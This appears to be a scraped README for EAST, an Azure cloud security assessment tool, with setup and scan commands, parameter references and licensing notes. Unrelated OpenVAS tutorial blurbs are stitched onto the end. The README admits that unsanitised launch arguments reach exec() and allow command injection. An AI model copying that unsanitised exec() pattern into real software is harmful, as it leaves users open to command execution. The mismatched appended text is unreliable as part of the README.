Essentially running it in read-only mode, reduces a lot of the risk associated with possibly compromised NPM packages (Google compromised NPM)
Bugs etc: You can protect your environment against certain mistakes in this code by running the tool with reader-only permissions
Lot of the code is "AS IS": Meaning, it's been serving only the purpose of creating certain result; Lot of cleaning up and modularizing remains to be finished
There are no tests at the moment, apart from certain manual checks, that are run after changes to main.js and various more advanced controls.
The control descriptions at this stage are not the final product, so giving feedback on them, while appreciated, is not the focus of the tooling at this stage
As the name implies, we use it as tool to evaluate environments. It is not meant to be run as unmonitored for the time being, and should not be run in any internet exposed service that accepts incoming connections.
Documentation could be described as incomplete for the time being
EAST is mostly focused on PaaS resource, as most of our Azure assessments focus on this resource type
No Input sanitization is performed on launch params, as it is always assumed, that the input of these parameters are controlled. That being said, the tool uses extensively exec() - While I have not reviewed all paths, I believe that achieving shellcode execution is trivial. This tool does not assume hostile input, thus the recommendation is that you don't paste launch arguments into command line without reviewing them first.
Tool operation
Depedencies
To reduce amount of code we use the following depedencies for operation and aesthetics are used (Kudos to the maintainers of these fantastic packages)
Other depedencies for running the tool: If you are planning to run this in Azure Cloud Shell you don't need to install Azure CLI:
This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)
Azure Cloud Shell (BASH) or applicable Linux Distro / WSL
if (item.properties?.adminUserEnabled == false ){returnObject.isHealthy = true }
Advanced
Advanced controls include checks beyond the initial ARM object. Often invoking new requests to get further information about the resource in scope and it's relation to other services.
Example: Role Assignments
Besides checking the role assignments of subscription, additional check is performed via Azure AD Conditional Access Reporting for MFA, and that privileged accounts are not only protected by passwords (SPN's with client secrets)
Azure Data Factory pipeline mapping combines pipelines -> activities -> and data targets together and then checks for secrets leaked on the logs via run history of the said activities.
Composite
Composite controls combines two or more control results from pipeline, in order to form one, or more new controls. Using composites solves two use cases for EAST
You cant guarantee an order of control results being returned in the pipeline
You need to return more than one control result from single check
Get alerts from Microsoft Cloud Defender on subscription check
Form new controls per resourceProvider for alerts
Reporting
EAST is not focused to provide automated report generation, as it provides mostly JSON files with control and evaluation status. The idea is to use separate tooling to create reports, which are fairly trivial to automate via markdown creation scripts and tools such as Pandoc
While focus is not on the reporting, this repo includes example automation for report creation with pandoc to ease reading of the results in single document format.
cff-version: 1.2.0 title: Pandoc message: "If you use this software, please cite it as below." type: software url: "https://github.com/jgm/pandoc" authors: - given-names: John family-names: MacFarlane email: jgm@berkeley.edu orcid: 'https://orcid.org/0000-0003-2557-9090' - given-names: Albert family-names: Krewinkel email: tarleb+github@moltkeplatz.de orcid: '0000-0002-9455-0796' - given-names: Jesse family-names: Rosenthal email: jrosenthal@jhu.edu
Running EAST scan
This part has guide how to run this either on BASH@linux, or BASH on Azure Cloud Shell (obviously Cloud Shell is Linux too, but does not require that you have your own linux box to use this)
β οΈIf you are running the tool in Cloud Shell, you might need to reapply some of the installations again as Cloud Shell does not persist various session settings.
Detailed Prerequisites (This is if you opted no to do the "fire and forget version")
Prerequisites
git clone https://github.com/jsa2/EAST --branch preview cd EAST; npm install
Pandoc installation on cloud shell
# Get pandoc for reporting (first time only) wget "https://github.com/jgm/pandoc/releases/download/2.17.1.1/pandoc-2.17.1.1-linux-amd64.tar.gz"; tar xvzf "pandoc-2.17.1.1-linux-amd64.tar.gz" --strip-components 1 -C ~
Installing pandoc on distros that support APT
# Get pandoc for reporting (first time only) sudo apt install pandoc
Login Az CLI and run the scan
# Relogin is required to ensure token cache is placed on session on cloud shell
az account clear az login
# cd EAST # replace the subid below with your subscription ID! subId=6193053b-408b-44d0-b20f-4e29b9b67394 # node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId
Generate report
cd EAST; node templatehelpers/eastReports.js --doc
If you want to include all Azure Security Benchmark results in the report
cd EAST; node templatehelpers/eastReports.js --doc --asb
Share relevant controls across multiple environments as community effort
Company use
Companies have possibility to develop company specific controls which apply to company specific work. Companies can then control these implementations by decision to share, or not share them based on the operating principle of that company.
Non IPR components
Code logic and functions are under MIT license. since code logic and functions are alredy based on open-source components & vendor API's, it does not make sense to restrict something that is already based on open source
If you use this tool as part of your commercial effort we only require, that you follow the very relaxed terms of MIT license
Use rich and maintained context of Microsoft Azure CLIlogin & commands with Node.js control flow which supplies enhanced rest-requests and maps results to schema.
This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)
β Using Node.js runtime as orchestrator utilises Nodes asynchronous nature allowing batching of requests. Batching of requests utilizes the full extent of Azure Resource Managers incredible speed.
β Compared to running requests one-by-one, the speedup can be up to 10x, when Node executes the batch of requests instead of single request at time
clears tokens in session folder, use this if you get authorization errors, or have just changed to other az login account use az account clear if you want to clear AZ CLI cache too
no values
--tag
Filter all results in the end based on single tag--tag=svc=aksdev
no values
--ignorePreCheck
use this option when used with browser delegated tokens
no values
--helperTexts
Will append text descriptions from general to manual controls
no values
--reprocess
Will update results to existing content.json. Useful for incremental runs
no values
Parameters reference for example report:
node templatehelpers/eastReports.js --asb
Param
Description
Default if undefined
--asb
gets all ASB results available to users
no values
--policy
gets all Policy results available to users
no values
--doc
prints pandoc string for export to console
no values
(Highly experimental) Running in restricted environments where only browser use is available
β οΈDetect principals in privileged subscriptions roles protected only by password-based single factor authentication.
Checks for users without MFA policies applied for set of conditions
Checks for ServicePrincipals protected only by password (as opposed to using Certificate Credential, workload federation and or workload identity CA policy)
An unused credential on an application can result in security breach. While it's convenient to use password. secrets as a credential, we strongly recommend that you use x509 certificates as the only credential type for getting tokens for your application
Following methods work for contributing for the time being:
Submit a pull request with code / documentation change
Submit a issue
issue can be a:
β οΈProblem (issue)
οFeature request
βQuestion
Other
By default EAST tries to work with the current depedencies - Introducing new (direct) depedencies is not directly encouraged with EAST. If such vital depedency is introduced, then review licensing of such depedency, and update readme.md - depedencies
There is nothing to prevent you from creating your own fork of EAST with your own depedencies
For all scans so far, weβve only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we donβt want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...]
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...]
Is the previous tutorial Vulnerability Scanning with OpenVAS 9.0 part 1 weβve gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes weβve also installed a virtual machine with Metasploitable 2 [...]
A couple years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. Weβve covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this tutorial I want to cover more details [...]